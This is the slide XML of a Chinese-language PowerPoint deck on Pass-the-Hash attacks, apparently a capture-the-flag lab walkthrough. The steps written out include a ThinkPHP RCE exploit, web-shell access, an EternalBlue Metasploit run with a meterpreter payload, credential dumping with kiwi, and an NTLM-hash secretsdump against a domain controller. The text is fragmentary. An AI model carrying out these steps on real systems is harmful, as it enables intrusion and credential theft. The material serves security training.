        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5743787" y="3022600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</a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="lt1">
              <a:alpha val="100000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7259206">
            <a:off x="6589098" y="4674355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</a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="lt1">
              <a:alpha val="100000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Freeform 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-7221168">
            <a:off x="4910864" y="4658432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</a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="l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6941312" y="1711093"/>
            <a:ext cx="3862453" cy="112166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无需明文密码即可横向移动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33969" y="4100915"/>
            <a:ext cx="3190554" cy="112166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使用工具如Mimikatz进行PTH攻击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9006" y="3172778"/>
            <a:ext cx="3483489" cy="163258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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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type3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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计算</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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的时候，客户端是使用用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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进行计算的，而不是用户密码进行计算的。因此在模拟用户登录的时候。是不需要用户明文密码的，只需要用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="15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5012267" y="3733610"/>
            <a:ext cx="2167467" cy="1826280"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="100000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5786411" y="3999944"/>
            <a:ext cx="661803" cy="66180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</a:path>
              <a:path w="304800" h="304800"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</a:path>
              <a:path w="304800" h="304800"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400007" name="AutoShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503038" y="468853"/>
            <a:ext cx="3978077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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2425" b="1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PTH(Pass The Hash)攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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3101975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BED3-880F-439E-0606-D7063B068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1174A5-DDD7-8AC6-8B17-5A6BB4500EE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343984" y="1871759"/>
            <a:ext cx="106414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step1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>扫描目标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主机的端口和漏洞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err="1"/>
              <a:t>fscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t> –h </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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发现存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>1day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>漏洞，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>thinkphp5.0.23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rce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>漏洞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7635B-3679-0CCB-ADB4-38DCE063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35" y="3104181"/>
            <a:ext cx="801164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5153D-3488-808C-44B8-2E01BE83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DAC607-9AD9-BF7C-814B-91FC9310963B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343984" y="1871759"/>
            <a:ext cx="106414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step2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>对该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>漏洞使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>thinkphpgui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>exploit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pass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peiqi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>，通过哥斯拉或者蚁剑连上去，推荐哥斯拉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223925-CB0D-C365-7D87-737255AB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6" y="2249882"/>
            <a:ext cx="10535034" cy="27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0F925-CBDE-227E-1C05-FEB14B52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F5D177-9663-9AB4-DACE-F909C6C6061F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343984" y="1871759"/>
            <a:ext cx="10641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step3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>发现连接上去不是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用户，需通过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提权，读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>flag01.txt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发现存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>1day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>漏洞，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>thinkphp5.0.23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rce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>漏洞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此处使用哥斯拉的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>real 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插件，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>机器上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>映射到本地的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>5555</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>端口进行交互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CBA68B-B394-ABEC-46D2-4335F6CF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38" y="2496021"/>
            <a:ext cx="7315214" cy="1865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F37884-EA82-8542-5372-3AEEF110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38" y="4918747"/>
            <a:ext cx="4318340" cy="18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6556-3D4C-81B9-4597-DF0392A7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4535E8-2B71-ADEE-6730-CA0C8A7BA78F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343984" y="1871759"/>
            <a:ext cx="1064140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step4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>fscan.elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>到该机器，对内网进行扫描，看到共</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>台机器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>fscan.elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t> -h 172.22.1.15/24 &gt;&gt; re.txt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dirty="0"/>
              <a:t>172.22.1.21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>存在永恒之蓝漏洞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B3088-0210-F704-CD27-950D34F0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77" y="2485444"/>
            <a:ext cx="5106113" cy="1457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42400A-13E0-095A-CB86-3C7BA6C3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77" y="3942972"/>
            <a:ext cx="9804741" cy="15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4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ACDE7-F49C-DF5D-60E9-8FB5970D1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23A82B-53E2-A961-E319-CF62E899A5C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343984" y="1871759"/>
            <a:ext cx="10641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step5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>gost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>机器上，建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>socks5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>代理隧道，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>proxifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>对满足规则的流量转发到该代理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./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>gost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t> –L socks5://:1099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39881D-33D0-63AA-092E-1A973A62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96" y="2384812"/>
            <a:ext cx="3577696" cy="37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3064-10B7-E118-0500-28F6F87E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31BDB9-D097-0FD4-2F00-D9735210C7E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343984" y="1871759"/>
            <a:ext cx="106414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step6.msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>利用永恒之蓝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>，拿到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>172.22.1.21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>的系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t>search 17-010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t>use 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t>set payload windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>meterpreter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bind_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>rhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t> 172.22.1.21</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t>run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E6A98-AFEE-16EC-5E80-61C31E0B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02" y="3630454"/>
            <a:ext cx="5214330" cy="25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8D4E1-F98D-5F5C-2730-78517C79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C0F5A1-1C76-FF60-6BDA-F71246D79AFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343984" y="1871759"/>
            <a:ext cx="106414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step7.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metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>kiwi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>模块，列举当前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>机器的所有凭证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t>load kiwi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>creds_all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dirty="0"/>
              <a:t>成功获取到当前用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>NTLM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>哈希</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600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7EAE3-938B-F64A-2629-0F16A9D5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76" y="2776500"/>
            <a:ext cx="7227238" cy="29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CE7B-C48F-B231-52DC-519959F9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46230E-077F-4C9B-D5AB-60CD7631CB91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343984" y="1871759"/>
            <a:ext cx="10641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step8.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impackets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>工具包拿到管理员的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>ntlm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>哈希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python secretsdump.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>xiaorang.lab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0"/>
              <a:t>/XIAORANG-WIN7$:@172.22.1.2 -hashes :9d7ed0027035f9270504a76468b1044d -just-dc-user Administrator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A8BFC-3394-EF02-0B3F-EBD551DA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28" y="3373768"/>
            <a:ext cx="9706550" cy="1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9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717</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>168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Hunter Data</dc:creator>
  <cp:lastModifiedBy>Hunter Data</cp:lastModifiedBy>
  <cp:revision>31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-21T15:07:19Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-22T01:15:19Z</dcterms:modified>
</cp:coreProperties>
</file>